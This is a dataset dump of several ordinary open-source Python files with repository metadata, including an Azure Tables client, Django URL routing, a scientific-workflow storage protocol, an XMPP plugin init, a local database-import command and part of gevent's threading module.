Dataset schema (columns appear in this order, '|'-separated, in the rows below; ⌀ marks a nullable column):

  blob_id               string, length 40
  directory_id          string, length 40
  path                  string, length 3–616
  content_id            string, length 40
  detected_licenses     sequence, length 0–112
  license_type          string, 2 classes
  repo_name             string, length 5–115
  snapshot_id           string, length 40
  revision_id           string, length 40
  branch_name           string, 777 classes
  visit_date            timestamp[us], 2015-08-06 10:31:46 – 2023-09-06 10:44:38
  revision_date         timestamp[us], 1970-01-01 02:38:32 – 2037-05-03 13:00:00
  committer_date        timestamp[us], 1970-01-01 02:38:32 – 2023-09-06 01:08:06
  github_id             int64, 4.92k – 681M ⌀
  star_events_count     int64, 0 – 209k
  fork_events_count     int64, 0 – 110k
  gha_license_id        string, 22 classes
  gha_event_created_at  timestamp[us], 2012-06-04 01:52:49 – 2023-09-14 21:59:50 ⌀
  gha_created_at        timestamp[us], 2008-05-22 07:58:19 – 2023-08-21 12:35:19 ⌀
  gha_language          string, 149 classes
  src_encoding          string, 26 classes
  language              string, 1 class
  is_vendor             bool, 2 classes
  is_generated          bool, 2 classes
  length_bytes          int64, 3 – 10.2M
  extension             string, 188 classes
  content               string, length 3 – 10.2M
  authors               sequence, length 1
  author_id             string, length 1–132

---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
3fcda686d4f3fae22c7c376a354a4e591f5e6b78 | f4434c85e3814b6347f8f8099c081ed4af5678a5 | /sdk/tables/azure-data-tables/azure/data/tables/_table_client.py | 68ea82dc76b49f897a6edccb3aec84471859f7ef | [
"LicenseRef-scancode-generic-cla",
"MIT",
"LGPL-2.1-or-later"
] | permissive | yunhaoling/azure-sdk-for-python | 5da12a174a37672ac6ed8e3c1f863cb77010a506 | c4eb0ca1aadb76ad892114230473034830116362 | refs/heads/master | 2022-06-11T01:17:39.636461 | 2020-12-08T17:42:08 | 2020-12-08T17:42:08 | 177,675,796 | 1 | 0 | MIT | 2020-03-31T20:35:17 | 2019-03-25T22:43:40 | Python | UTF-8 | Python | false | false | 24,634 | py | # -------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------
import functools
from typing import Optional, Any, Dict, Union  # pylint: disable = W0611
try:
from urllib.parse import urlparse, unquote
except ImportError:
from urlparse import urlparse # type: ignore
from urllib2 import unquote # type: ignore
from azure.core.exceptions import HttpResponseError, ResourceNotFoundError
from azure.core.paging import ItemPaged
from azure.core.tracing.decorator import distributed_trace
from ._deserialize import _convert_to_entity, _trim_service_metadata
from ._entity import TableEntity
from ._error import _process_table_error
from ._generated import AzureTable
from ._generated.models import (
# AccessPolicy,
SignedIdentifier,
TableProperties,
)
from ._serialize import _get_match_headers, _add_entity_properties
from ._base_client import parse_connection_str
from ._table_client_base import TableClientBase
from ._serialize import serialize_iso
from ._deserialize import _return_headers_and_deserialized
from ._table_batch import TableBatchOperations
from ._models import TableEntityPropertiesPaged, UpdateMode, AccessPolicy
class TableClient(TableClientBase):
""" :ivar str account_name: Name of the storage account (Cosmos or Azure)"""
def __init__(
self, account_url, # type: str
table_name, # type: str
credential=None, # type: str
**kwargs # type: Any
):
# type: (...) -> None
"""Create TableClient from a Credential.
:param account_url:
A url to an Azure Storage account.
:type account_url: str
:param table_name: The table name.
:type table_name: str
:param credential:
The credentials with which to authenticate. This is optional if the
account URL already has a SAS token, or the connection string already has shared
access key values. The value can be a SAS token string or an account shared access
key.
:type credential: str
:returns: None
"""
super(TableClient, self).__init__(account_url, table_name, credential=credential, **kwargs)
self._client = AzureTable(self.url, pipeline=self._pipeline)
@classmethod
def from_connection_string(
cls, conn_str, # type: str
table_name, # type: str
**kwargs # type: Any
):
# type: (...) -> TableClient
"""Create TableClient from a Connection String.
:param conn_str:
A connection string to an Azure Storage or Cosmos account.
:type conn_str: str
:param table_name: The table name.
:type table_name: str
:returns: A table client.
:rtype: ~azure.data.tables.TableClient
.. admonition:: Example:
.. literalinclude:: ../samples/sample_create_client.py
:start-after: [START create_table_client]
:end-before: [END create_table_client]
:language: python
:dedent: 8
:caption: Authenticating a TableServiceClient from a connection_string
"""
account_url, credential = parse_connection_str(
conn_str=conn_str, credential=None, service='table', keyword_args=kwargs)
return cls(account_url, table_name=table_name, credential=credential, **kwargs)
@classmethod
def from_table_url(cls, table_url, credential=None, **kwargs):
# type: (str, Optional[Any], Any) -> TableClient
"""A client to interact with a specific Table.
:param table_url: The full URI to the table, including SAS token if used.
:type table_url: str
:param credential:
The credentials with which to authenticate. This is optional if the
account URL already has a SAS token. The value can be a SAS token string, an account
shared access key.
:type credential: str
:returns: A table client.
:rtype: ~azure.data.tables.TableClient
"""
try:
if not table_url.lower().startswith('http'):
table_url = "https://" + table_url
except AttributeError:
raise ValueError("Table URL must be a string.")
parsed_url = urlparse(table_url.rstrip('/'))
if not parsed_url.netloc:
raise ValueError("Invalid URL: {}".format(table_url))
table_path = parsed_url.path.lstrip('/').split('/')
account_path = ""
if len(table_path) > 1:
account_path = "/" + "/".join(table_path[:-1])
account_url = "{}://{}{}?{}".format(
parsed_url.scheme,
parsed_url.netloc.rstrip('/'),
account_path,
parsed_url.query)
table_name = unquote(table_path[-1])
if not table_name:
raise ValueError("Invalid URL. Please provide a URL with a valid table name")
return cls(account_url, table_name=table_name, credential=credential, **kwargs)
@distributed_trace
def get_table_access_policy(
self,
**kwargs # type: Any
):
# type: (...) -> Dict[str,AccessPolicy]
"""Retrieves details about any stored access policies specified on the table that may be
used with Shared Access Signatures.
:return: Dictionary of SignedIdentifiers
:rtype: dict[str,AccessPolicy]
:raises ~azure.core.exceptions.HttpResponseError:
"""
timeout = kwargs.pop('timeout', None)
try:
_, identifiers = self._client.table.get_access_policy(
table=self.table_name,
timeout=timeout,
cls=kwargs.pop('cls', None) or _return_headers_and_deserialized,
**kwargs)
except HttpResponseError as error:
_process_table_error(error)
return {s.id: s.access_policy or AccessPolicy() for s in identifiers}
@distributed_trace
def set_table_access_policy(
self,
signed_identifiers, # type: Dict[str,AccessPolicy]
**kwargs):
# type: (...) -> None
"""Sets stored access policies for the table that may be used with Shared Access Signatures.
:param signed_identifiers:
:type signed_identifiers: dict[str,AccessPolicy]
:return: None
:rtype: None
:raises ~azure.core.exceptions.HttpResponseError:
"""
self._validate_signed_identifiers(signed_identifiers)
identifiers = []
for key, value in signed_identifiers.items():
if value:
value.start = serialize_iso(value.start)
value.expiry = serialize_iso(value.expiry)
identifiers.append(SignedIdentifier(id=key, access_policy=value))
signed_identifiers = identifiers # type: ignore
try:
self._client.table.set_access_policy(
table=self.table_name,
table_acl=signed_identifiers or None,
**kwargs)
except HttpResponseError as error:
_process_table_error(error)
@distributed_trace
def create_table(
self,
**kwargs # type: Any
):
# type: (...) -> Dict[str,str]
"""Creates a new table under the current account.
:return: Dictionary of operation metadata returned from service
:rtype: dict[str,str]
:raises ~azure.core.exceptions.ResourceExistsError: If the table already exists
.. admonition:: Example:
.. literalinclude:: ../samples/sample_create_delete_table.py
:start-after: [START create_table_from_table_client]
:end-before: [END create_table_from_table_client]
:language: python
:dedent: 8
:caption: Creating a table from the TableClient object
"""
table_properties = TableProperties(table_name=self.table_name, **kwargs)
try:
metadata, _ = self._client.table.create(
table_properties,
cls=kwargs.pop('cls', _return_headers_and_deserialized))
return _trim_service_metadata(metadata)
except HttpResponseError as error:
_process_table_error(error)
@distributed_trace
def delete_table(
self,
**kwargs # type: Any
):
# type: (...) -> None
"""Deletes the table under the current account.
:return: None
:rtype: None
:raises ~azure.core.exceptions.ResourceNotFoundError: If the table does not exist
.. admonition:: Example:
.. literalinclude:: ../samples/sample_create_delete_table.py
:start-after: [START delete_table_from_table_client]
:end-before: [END delete_table_from_table_client]
:language: python
:dedent: 8
:caption: Deleting a table from the TableClient object
"""
try:
self._client.table.delete(table=self.table_name, **kwargs)
except HttpResponseError as error:
_process_table_error(error)
@distributed_trace
def delete_entity(
self,
partition_key, # type: str
row_key, # type: str
**kwargs # type: Any
):
# type: (...) -> None
"""Deletes the specified entity in a table.
:param partition_key: The partition key of the entity.
:type partition_key: str
:param row_key: The row key of the entity.
:type row_key: str
:keyword str etag: Etag of the entity
:keyword ~azure.core.MatchConditions match_condition: MatchCondition
:return: None
:rtype: None
:raises ~azure.core.exceptions.ResourceNotFoundError: If the entity does not exist
.. admonition:: Example:
.. literalinclude:: ../samples/sample_insert_delete_entities.py
:start-after: [START delete_entity]
:end-before: [END delete_entity]
:language: python
:dedent: 8
:caption: Deleting an entity to a Table
"""
if_match, _ = _get_match_headers(kwargs=dict(kwargs, etag=kwargs.pop('etag', None),
match_condition=kwargs.pop('match_condition', None)),
etag_param='etag', match_param='match_condition')
try:
self._client.table.delete_entity(
table=self.table_name,
partition_key=partition_key,
row_key=row_key,
if_match=if_match or '*',
**kwargs)
except HttpResponseError as error:
_process_table_error(error)
@distributed_trace
def create_entity(
self,
entity, # type: Union[TableEntity, Dict[str,str]]
**kwargs # type: Any
):
# type: (...) -> Dict[str,str]
"""Insert entity in a table.
:param entity: The properties for the table entity.
:type entity: TableEntity or dict[str,str]
:return: Dictionary mapping operation metadata returned from the service
:rtype: dict[str,str]
:raises ~azure.core.exceptions.ResourceExistsError: If the entity already exists
.. admonition:: Example:
.. literalinclude:: ../samples/sample_insert_delete_entities.py
:start-after: [START create_entity]
:end-before: [END create_entity]
:language: python
:dedent: 8
:caption: Creating and adding an entity to a Table
"""
if "PartitionKey" in entity and "RowKey" in entity:
entity = _add_entity_properties(entity)
else:
raise ValueError('PartitionKey and RowKey were not provided in entity')
try:
metadata, _ = self._client.table.insert_entity(
table=self.table_name,
table_entity_properties=entity,
cls=kwargs.pop('cls', _return_headers_and_deserialized),
**kwargs)
return _trim_service_metadata(metadata)
except ResourceNotFoundError as error:
_process_table_error(error)
@distributed_trace
def update_entity(
self,
entity, # type: Union[TableEntity, Dict[str,str]]
mode=UpdateMode.MERGE, # type: UpdateMode
**kwargs # type: Any
):
# type: (...) -> Dict[str,str]
"""Update entity in a table.
:param entity: The properties for the table entity.
:type entity: TableEntity or dict[str,str]
:param mode: Merge or Replace entity
:type mode: ~azure.data.tables.UpdateMode
:keyword str partition_key: The partition key of the entity.
:keyword str row_key: The row key of the entity.
:keyword str etag: Etag of the entity
:keyword ~azure.core.MatchConditions match_condition: MatchCondition
:return: Dictionary mapping operation metadata returned from the service
:rtype: dict[str,str]
:raises ~azure.core.exceptions.HttpResponseError:
.. admonition:: Example:
.. literalinclude:: ../samples/sample_update_upsert_merge_entities.py
:start-after: [START update_entity]
:end-before: [END update_entity]
:language: python
:dedent: 8
:caption: Updating an already exiting entity in a Table
"""
if_match, _ = _get_match_headers(kwargs=dict(kwargs, etag=kwargs.pop('etag', None),
match_condition=kwargs.pop('match_condition', None)),
etag_param='etag', match_param='match_condition')
partition_key = entity['PartitionKey']
row_key = entity['RowKey']
entity = _add_entity_properties(entity)
try:
metadata = None
if mode is UpdateMode.REPLACE:
metadata, _ = self._client.table.update_entity(
table=self.table_name,
partition_key=partition_key,
row_key=row_key,
table_entity_properties=entity,
if_match=if_match or "*",
cls=kwargs.pop('cls', _return_headers_and_deserialized),
**kwargs)
elif mode is UpdateMode.MERGE:
metadata, _ = self._client.table.merge_entity(
table=self.table_name,
partition_key=partition_key,
row_key=row_key,
if_match=if_match or "*",
table_entity_properties=entity,
cls=kwargs.pop('cls', _return_headers_and_deserialized),
**kwargs)
else:
raise ValueError('Mode type is not supported')
return _trim_service_metadata(metadata)
except HttpResponseError as error:
_process_table_error(error)
@distributed_trace
def list_entities(
self,
**kwargs # type: Any
):
# type: (...) -> ItemPaged[TableEntity]
"""Lists entities in a table.
:keyword int results_per_page: Number of entities per page in return ItemPaged
:keyword select: Specify desired properties of an entity to return certain entities
:paramtype select: str or list[str]
:return: Query of table entities
:rtype: ~azure.core.paging.ItemPaged[~azure.data.tables.TableEntity]
:raises ~azure.core.exceptions.HttpResponseError:
.. admonition:: Example:
.. literalinclude:: ../samples/sample_update_upsert_merge_entities.py
:start-after: [START query_entities]
:end-before: [END query_entities]
:language: python
:dedent: 8
:caption: List all entities held within a table
"""
user_select = kwargs.pop('select', None)
if user_select and not isinstance(user_select, str):
user_select = ", ".join(user_select)
top = kwargs.pop('results_per_page', None)
command = functools.partial(self._client.table.query_entities, **kwargs)
return ItemPaged(
command,
table=self.table_name,
results_per_page=top,
select=user_select,
page_iterator_class=TableEntityPropertiesPaged
)
@distributed_trace
def query_entities(
self,
filter, # type: str # pylint: disable = W0622
**kwargs
):
# type: (...) -> ItemPaged[TableEntity]
"""Lists entities in a table.
:param str filter: Specify a filter to return certain entities
:keyword int results_per_page: Number of entities per page in return ItemPaged
:keyword select: Specify desired properties of an entity to return certain entities
:paramtype select: str or list[str]
:keyword dict parameters: Dictionary for formatting query with additional, user defined parameters
:return: Query of table entities
:rtype: ~azure.core.paging.ItemPaged[~azure.data.tables.TableEntity]
:raises ~azure.core.exceptions.HttpResponseError:
.. admonition:: Example:
.. literalinclude:: ../samples/sample_query_table.py
:start-after: [START query_entities]
:end-before: [END query_entities]
:language: python
:dedent: 8
:caption: Query entities held within a table
"""
parameters = kwargs.pop('parameters', None)
filter = self._parameter_filter_substitution(parameters, filter) # pylint: disable = W0622
top = kwargs.pop('results_per_page', None)
user_select = kwargs.pop('select', None)
if user_select and not isinstance(user_select, str):
user_select = ", ".join(user_select)
command = functools.partial(self._client.table.query_entities, **kwargs)
return ItemPaged(
command,
table=self.table_name,
results_per_page=top,
filter=filter,
select=user_select,
page_iterator_class=TableEntityPropertiesPaged
)
@distributed_trace
def get_entity(
self,
partition_key, # type: str
row_key, # type: str
**kwargs # type: Any
):
# type: (...) -> TableEntity
"""Get a single entity in a table.
:param partition_key: The partition key of the entity.
:type partition_key: str
:param row_key: The row key of the entity.
:type row_key: str
:return: Dictionary mapping operation metadata returned from the service
:rtype: ~azure.data.tables.TableEntity
:raises ~azure.core.exceptions.HttpResponseError:
.. admonition:: Example:
.. literalinclude:: ../samples/sample_update_upsert_merge_table.py
:start-after: [START get_entity]
:end-before: [END get_entity]
:language: python
:dedent: 8
:caption: Get a single entity from a table
"""
try:
entity = self._client.table.query_entities_with_partition_and_row_key(table=self.table_name,
partition_key=partition_key,
row_key=row_key,
**kwargs)
properties = _convert_to_entity(entity)
return properties
except HttpResponseError as error:
_process_table_error(error)
@distributed_trace
def upsert_entity( # pylint:disable=R1710
self,
entity, # type: Union[TableEntity, Dict[str,str]]
mode=UpdateMode.MERGE, # type: UpdateMode
**kwargs # type: Any
):
# type: (...) -> Dict[str,str]
"""Update/Merge or Insert entity into table.
:param entity: The properties for the table entity.
:type entity: TableEntity or dict[str,str]
:param mode: Merge or Replace and Insert on fail
:type mode: ~azure.data.tables.UpdateMode
:return: Dictionary mapping operation metadata returned from the service
:rtype: dict[str,str]
:raises ~azure.core.exceptions.HttpResponseError:
.. admonition:: Example:
.. literalinclude:: ../samples/sample_update_upsert_merge_entities.py
:start-after: [START upsert_entity]
:end-before: [END upsert_entity]
:language: python
:dedent: 8
:caption: Update/merge or insert an entity into a table
"""
partition_key = entity['PartitionKey']
row_key = entity['RowKey']
entity = _add_entity_properties(entity)
try:
metadata = None
if mode is UpdateMode.MERGE:
metadata, _ = self._client.table.merge_entity(
table=self.table_name,
partition_key=partition_key,
row_key=row_key,
table_entity_properties=entity,
cls=kwargs.pop('cls', _return_headers_and_deserialized),
**kwargs
)
elif mode is UpdateMode.REPLACE:
metadata, _ = self._client.table.update_entity(
table=self.table_name,
partition_key=partition_key,
row_key=row_key,
table_entity_properties=entity,
cls=kwargs.pop('cls', _return_headers_and_deserialized),
**kwargs)
else:
raise ValueError("""Update mode {} is not supported.
For a list of supported modes see the UpdateMode enum""".format(mode))
return _trim_service_metadata(metadata)
except HttpResponseError as error:
_process_table_error(error)
def create_batch(
self,
**kwargs # type: Dict[str, Any]
):
# type: (...) -> azure.data.tables.TableBatchOperations
"""Create a Batching object from a Table Client
:return: Object containing requests and responses
:rtype: ~azure.data.tables.TableBatchOperations
.. admonition:: Example:
.. literalinclude:: ../samples/sample_batching.py
:start-after: [START batching]
:end-before: [END batching]
:language: python
:dedent: 8
:caption: Using batches to send multiple requests at once
:raises None:
"""
return TableBatchOperations(
self._client,
self._client._serialize, # pylint:disable=protected-access
self._client._deserialize, # pylint:disable=protected-access
self._client._config, # pylint:disable=protected-access
self.table_name,
self,
**kwargs
)
def send_batch(
self, batch, # type: azure.data.tables.BatchTransactionResult
**kwargs # type: Any
):
# type: (...) -> BatchTransactionResult
"""Commit a TableBatchOperations to send requests to the server
:return: Object containing requests and responses
:rtype: ~azure.data.tables.BatchTransactionResult
:raises ~azure.data.tables.BatchErrorException:
.. admonition:: Example:
.. literalinclude:: ../samples/sample_batching.py
:start-after: [START batching]
:end-before: [END batching]
:language: python
:dedent: 8
:caption: Using batches to send multiple requests at once
"""
return self._batch_send(batch._entities, *batch._requests, **kwargs) # pylint:disable=protected-access
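# Usage sketch (connection string, table name and entity values below are
# placeholders, not from the original module):
#
#   client = TableClient.from_connection_string(conn_str="<connection-string>",
#                                               table_name="mytable")
#   client.create_table()
#   client.create_entity(entity={"PartitionKey": "pk1", "RowKey": "rk1", "text": "hello"})
#   entity = client.get_entity(partition_key="pk1", row_key="rk1")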
| [
"[email protected]"
] | |
a81597c63aba6f259d81ca952d201d0f7bc43c3a | 3601eb7ccde8ee96e7e65c9ab299e4053d088e70 | /licitte/urls.py | 8527111b88123d9ec86b8c2e28be52669516c814 | [] | no_license | ow7/licitte | ec73bd86d84da7311e2c8c261127f541584e1905 | e1bc5ce402425edbd38acd42b6fb07782bd08f9c | refs/heads/master | 2021-08-30T02:28:53.765789 | 2017-12-15T18:16:24 | 2017-12-15T18:16:24 | 114,397,715 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 927 | py | """licitte URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.11/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url
from django.contrib import admin
from django.shortcuts import render
urlpatterns = [
url(r'^(?P<template_name>.*\.html)', render),
url(r'^$', render, kwargs=dict(template_name='gentelella/index.html')),
url(r'^admin/', admin.site.urls),
]
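# Routing sketch for the patterns above: 'GET /admin/' serves the Django admin,
# 'GET /' renders gentelella/index.html, and any path ending in '.html' is
# rendered directly as a template of that name, e.g. 'GET /gentelella/index.html'.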
| [
"[email protected]"
] | |
aea2810a65c8473673713d7073b868aa0057c771 | 8c4ef53ec6c7df2eeeb633a53d1d931558596366 | /propertyestimator/protocols/storage.py | 5ed3b8a157424797084b7132befd9c807d2fdb0d | [
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | MSchauperl/propertyestimator | ff7bf2d3b6bc441141258483ec991f8806b09469 | 9a67cb61498024c511f9bbe55536ac8e1a3c93be | refs/heads/master | 2020-09-08T07:04:39.660322 | 2019-11-08T21:15:23 | 2019-11-08T21:15:23 | 221,055,340 | 0 | 0 | NOASSERTION | 2019-11-14T21:47:11 | 2019-11-11T19:34:28 | null | UTF-8 | Python | false | false | 7,869 | py | """
A collection of protocols for loading cached data off of the disk.
"""
import json
from os import path
from typing import Union
from propertyestimator.storage.dataclasses import StoredDataCollection
from propertyestimator.substances import Substance
from propertyestimator.thermodynamics import ThermodynamicState
from propertyestimator.utils.exceptions import PropertyEstimatorException
from propertyestimator.utils.serialization import TypedJSONDecoder, TypedJSONEncoder
from propertyestimator.workflow.decorators import protocol_input, protocol_output, UNDEFINED
from propertyestimator.workflow.plugins import register_calculation_protocol
from propertyestimator.workflow.protocols import BaseProtocol
@register_calculation_protocol()
class UnpackStoredDataCollection(BaseProtocol):
"""Loads a `StoredDataCollection` object from disk,
and makes its inner data objects easily accessible to other protocols.
"""
input_data_path = protocol_input(
docstring='A tuple which contains both the path to the simulation data object, '
'it\'s ancillary data directory, and the force field which was used '
'to generate the stored data.',
type_hint=Union[list, tuple],
default_value=UNDEFINED
)
collection_data_paths = protocol_output(
docstring='A dictionary of data object path, data directory path and '
'force field path tuples partitioned by the unique collection '
'keys.',
type_hint=dict
)
def execute(self, directory, available_resources):
if len(self.input_data_path) != 3:
return PropertyEstimatorException(directory=directory,
message='The input data path should be a tuple '
'of a path to the data object, directory, and a path '
'to the force field used to generate it.')
data_object_path = self.input_data_path[0]
data_directory = self.input_data_path[1]
force_field_path = self.input_data_path[2]
if not path.isfile(data_object_path):
return PropertyEstimatorException(directory=directory,
message='The path to the data object'
'is invalid: {}'.format(data_object_path))
if not path.isdir(data_directory):
return PropertyEstimatorException(directory=directory,
message='The path to the data directory'
'is invalid: {}'.format(data_directory))
if not path.isfile(force_field_path):
return PropertyEstimatorException(directory=directory,
message='The path to the force field'
'is invalid: {}'.format(force_field_path))
with open(data_object_path, 'r') as file:
data_object = json.load(file, cls=TypedJSONDecoder)
if not isinstance(data_object, StoredDataCollection):
return PropertyEstimatorException(directory=directory,
message=f'The data object must be a `StoredDataCollection` '
f'and not a {type(data_object)}')
self.collection_data_paths = {}
for data_key, inner_data_object in data_object.data.items():
inner_object_path = path.join(directory, f'{data_key}.json')
inner_directory_path = path.join(data_directory, data_key)
with open(inner_object_path, 'w') as file:
json.dump(inner_data_object, file, cls=TypedJSONEncoder)
self.collection_data_paths[data_key] = (inner_object_path,
inner_directory_path,
force_field_path)
return self._get_output_dictionary()
@register_calculation_protocol()
class UnpackStoredSimulationData(BaseProtocol):
"""Loads a `StoredSimulationData` object from disk,
and makes its attributes easily accessible to other protocols.
"""
simulation_data_path = protocol_input(
docstring='A list / tuple which contains both the path to the simulation data '
'object, it\'s ancillary data directory, and the force field which '
'was used to generate the stored data.',
type_hint=Union[list, tuple],
default_value=UNDEFINED
)
substance = protocol_output(
docstring='The substance which was stored.',
type_hint=Substance
)
total_number_of_molecules = protocol_output(
docstring='The total number of molecules in the stored system.',
type_hint=int
)
thermodynamic_state = protocol_output(
docstring='The thermodynamic state which was stored.',
type_hint=ThermodynamicState
)
statistical_inefficiency = protocol_output(
docstring='The statistical inefficiency of the stored data.',
type_hint=float
)
coordinate_file_path = protocol_output(
docstring='A path to the stored simulation output coordinates.',
type_hint=str
)
trajectory_file_path = protocol_output(
docstring='A path to the stored simulation trajectory.',
type_hint=str
)
statistics_file_path = protocol_output(
docstring='A path to the stored simulation statistics array.',
type_hint=str
)
force_field_path = protocol_output(
docstring='A path to the force field parameters used to generate the stored data.',
type_hint=str
)
def execute(self, directory, available_resources):
if len(self.simulation_data_path) != 3:
return PropertyEstimatorException(directory=directory,
message='The simulation data path should be a tuple '
'of a path to the data object, directory, and a path '
'to the force field used to generate it.')
data_object_path = self.simulation_data_path[0]
data_directory = self.simulation_data_path[1]
force_field_path = self.simulation_data_path[2]
if not path.isdir(data_directory):
return PropertyEstimatorException(directory=directory,
message='The path to the data directory'
'is invalid: {}'.format(data_directory))
if not path.isfile(force_field_path):
return PropertyEstimatorException(directory=directory,
message='The path to the force field'
'is invalid: {}'.format(force_field_path))
with open(data_object_path, 'r') as file:
data_object = json.load(file, cls=TypedJSONDecoder)
self.substance = data_object.substance
self.total_number_of_molecules = data_object.total_number_of_molecules
self.thermodynamic_state = data_object.thermodynamic_state
self.statistical_inefficiency = data_object.statistical_inefficiency
self.coordinate_file_path = path.join(data_directory, data_object.coordinate_file_name)
self.trajectory_file_path = path.join(data_directory, data_object.trajectory_file_name)
self.statistics_file_path = path.join(data_directory, data_object.statistics_file_name)
self.force_field_path = force_field_path
return self._get_output_dictionary()
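# Usage sketch (paths are placeholders; the id argument is assumed to follow
# BaseProtocol's constructor):
#
#   protocol = UnpackStoredSimulationData('unpack_data')
#   protocol.simulation_data_path = ('data.json', 'data_directory/', 'forcefield.json')
#   result = protocol.execute('working_directory', available_resources=None)
#   # on success, protocol.coordinate_file_path etc. point into data_directory/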
| [
"[email protected]"
] | |
71a3bb66245a57da0b9a687f7218be571dc7bd17 | 66a9c25cf0c53e2c3029b423018b856103d709d4 | /sleekxmpp/plugins/xep_0080/__init__.py | cad23d221c641d7c8215c12347b0c7f54ddb50af | [
"MIT",
"BSD-3-Clause",
"BSD-2-Clause"
] | permissive | fritzy/SleekXMPP | 1b02d3e2b22efeb6bf3f8f487e6c0343b9b85baf | cc1d470397de768ffcc41d2ed5ac3118d19f09f5 | refs/heads/develop | 2020-05-22T04:14:58.568822 | 2020-02-18T22:54:57 | 2020-02-18T22:54:57 | 463,405 | 658 | 254 | NOASSERTION | 2023-06-27T20:05:54 | 2010-01-08T05:54:45 | Python | UTF-8 | Python | false | false | 388 | py | """
SleekXMPP: The Sleek XMPP Library
Copyright (C) 2010 Nathanael C. Fritz, Erik Reuterborg Larsson
This file is part of SleekXMPP.
See the file LICENSE for copying permission.
"""
from sleekxmpp.plugins.base import register_plugin
from sleekxmpp.plugins.xep_0080.stanza import Geoloc
from sleekxmpp.plugins.xep_0080.geoloc import XEP_0080
register_plugin(XEP_0080)
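# Usage sketch: a client enables the plugin by name, e.g.
#
#   xmpp = sleekxmpp.ClientXMPP(jid, password)
#   xmpp.register_plugin('xep_0080')  # XEP-0080: User Location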
| [
"[email protected]"
] | |
8d2ecc7056b9b55738c10426695a9662c51431d1 | d9f6f439300d298246c37ccfb881e8e8af4fda22 | /cfp/management/commands/pgimport.py | b2d47ebf1f43914e8cb93b5055a27b966d35cd71 | [
"MIT"
] | permissive | ajlozier/speakers | e62b8d346a58a034998860d1b42a38b00cbdbd23 | d7d87c99b1cfa5f9df5455f737385115d9d5279c | refs/heads/master | 2021-09-08T19:33:08.894305 | 2018-03-12T00:54:10 | 2018-03-12T00:54:10 | 122,101,157 | 0 | 0 | null | 2018-02-19T18:08:18 | 2018-02-19T18:08:18 | null | UTF-8 | Python | false | false | 936 | py | import os
import subprocess as sh
from cfp.management.base import SentryCommand
class Command(SentryCommand):
help = 'Import the production database locally'
def handle(self, *args, **options):
if not os.environ['ENVIRONMENT'] == 'DEVELOPMENT':
raise ValueError('This command can only be run in development')
try:
sh.check_call(['dropdb', 'speakers'])
sh.check_call(['createdb', 'speakers'])
sh.check_call(['heroku', 'pgbackups:capture'])
url = sh.check_output(['heroku', 'pgbackups:url'])
sh.check_call(['curl', '-o', 'latest.dump', url])
sh.call(['pg_restore', '--verbose', '--clean', '--no-acl',
'--no-owner', '-j', '2', '-h', 'localhost', '-d',
'speakers', 'latest.dump'])
finally:
if os.path.exists('latest.dump'):
os.unlink('latest.dump')
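# Invocation sketch: as a Django management command this runs via
#
#   python manage.py pgimport
#
# and assumes ENVIRONMENT=DEVELOPMENT plus local postgres and heroku CLI tools.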
| [
"[email protected]"
] | |
cef8f53cd10fa1316157e73bf4527f28334914b2 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02621/s707981559.py | d48999af6cee0614504843656936330202f81205 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 76 | py | a = int(input().rstrip())
ans = lambda a: int(a + a**2 + a**3)
print(ans(a)) | [
"[email protected]"
] | |
96d0eb0199a49eab488eea08106fc599250023c4 | 271c7959a39f3d7ff63dddf285004fd5badee4d9 | /venv/Lib/site-packages/gevent/threading.py | 570ccd6c3e1c22ccffca38fbb0b971a6c35afd1a | [
"MIT"
] | permissive | natemellendorf/configpy | b6b01ea4db1f2b9109fd4ddb860e9977316ed964 | 750da5eaef33cede9f3ef532453d63e507f34a2c | refs/heads/master | 2022-12-11T05:22:54.289720 | 2019-07-22T05:26:09 | 2019-07-22T05:26:09 | 176,197,442 | 4 | 1 | MIT | 2022-12-08T02:48:51 | 2019-03-18T03:24:12 | Python | UTF-8 | Python | false | false | 8,634 | py | """
Implementation of the standard :mod:`threading` using greenlets.
.. note::
This module is a helper for :mod:`gevent.monkey` and is not
intended to be used directly. For spawning greenlets in your
applications, prefer higher level constructs like
:class:`gevent.Greenlet` class or :func:`gevent.spawn`. Attributes
in this module like ``__threading__`` are implementation artifacts subject
to change at any time.
.. versionchanged:: 1.2.3
Defer adjusting the stdlib's list of active threads until we are
monkey patched. Previously this was done at import time. We are
documented to only be used as a helper for monkey patching, so this should
functionally be the same, but some applications ignore the documentation and
directly import this module anyway.
A positive consequence is that ``import gevent.threading,
threading; threading.current_thread()`` will no longer return a DummyThread
before monkey-patching.
"""
from __future__ import absolute_import
__implements__ = [
'local',
'_start_new_thread',
'_allocate_lock',
'Lock',
'_get_ident',
'_sleep',
'_DummyThread',
]
import threading as __threading__
_DummyThread_ = __threading__._DummyThread
from gevent.local import local
from gevent.thread import start_new_thread as _start_new_thread, allocate_lock as _allocate_lock, get_ident as _get_ident
from gevent.hub import sleep as _sleep, getcurrent
# Exports, prevent unused import warnings
local = local
start_new_thread = _start_new_thread
allocate_lock = _allocate_lock
_get_ident = _get_ident
_sleep = _sleep
getcurrent = getcurrent
Lock = _allocate_lock
def _cleanup(g):
__threading__._active.pop(_get_ident(g), None)
def _make_cleanup_id(gid):
def _(_r):
__threading__._active.pop(gid, None)
return _
_weakref = None
class _DummyThread(_DummyThread_):
# We avoid calling the superclass constructor. This makes us about
